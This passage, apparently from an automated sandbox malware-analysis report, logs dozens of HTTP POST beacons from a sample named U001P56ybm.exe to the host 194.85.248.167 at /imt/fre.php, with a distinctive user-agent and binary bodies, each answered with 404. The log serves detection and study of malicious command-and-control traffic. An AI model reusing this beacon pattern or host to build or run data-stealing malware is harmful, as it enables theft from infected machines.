                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349745194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:18.837898016 CET1082OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:20.563548088 CET1082INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:18 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.349756194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:37.775846004 CET1116OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:39.011204958 CET1117INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:37 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.349757194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:40.734394073 CET1118OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:41.150240898 CET1118INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.349758194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:44.172504902 CET1119OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:44.258064032 CET1120INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.349759194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:45.537822008 CET1120OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:46.363115072 CET1121INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.349760194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:47.475042105 CET1122OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:47.564037085 CET1123INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:47 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.349761194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:48.480655909 CET1123OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:48.579071045 CET1124INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.349762194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:51.071537018 CET1125OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:51.163779974 CET1125INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.349763194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:52.226443052 CET1126OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:52.969003916 CET1127INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:52 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.349765194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:54.348325014 CET1138OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:54.655709982 CET1139INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.349766194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:55.798213005 CET1140OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:56.114464998 CET1141INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.349746194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:21.772417068 CET1083OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:21.949353933 CET1084INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:21 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.349769194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:58.836458921 CET1156OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:59.163003922 CET1156INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:58 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.349770194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:01.423938036 CET1268OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:02.684122086 CET1404INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:01 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.349785194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:07.452291965 CET1965OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:07.544955015 CET1967INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.349809194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:09.396769047 CET7360OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:09.919205904 CET7365INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.349813194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:13.834389925 CET7369OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:13.931421995 CET7370INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:13 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.349814194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:19.463238955 CET7370OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:20.086960077 CET7371INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:19 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.349817194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:23.655364990 CET7987OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:24.492059946 CET7988INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.349818194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:26.318058014 CET7988OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:26.435048103 CET7989INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.349819194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:27.828007936 CET7990OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:27.923948050 CET7991INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:27 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.349820194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:29.237001896 CET7991OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:29.329432964 CET7992INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.349747194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:23.379975080 CET1084OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:23.474404097 CET1085INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.349821194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:30.587831020 CET7992OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:30.896799088 CET7993INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.349822194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:32.864603043 CET7994OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:32.960192919 CET7994INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:32 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.349823194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:35.140691042 CET7995OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:35.375535965 CET7996INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.349825194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:36.493113041 CET8002OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:37.014189005 CET8003INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:36 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.349827194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:40.295825958 CET8012OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:40.387691975 CET8012INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.349829194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:41.914761066 CET8020OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:42.233618021 CET8020INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:41 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.349833194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:44.612993956 CET8044OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:44.707284927 CET8045INHTTP/1.0 404 Not Found
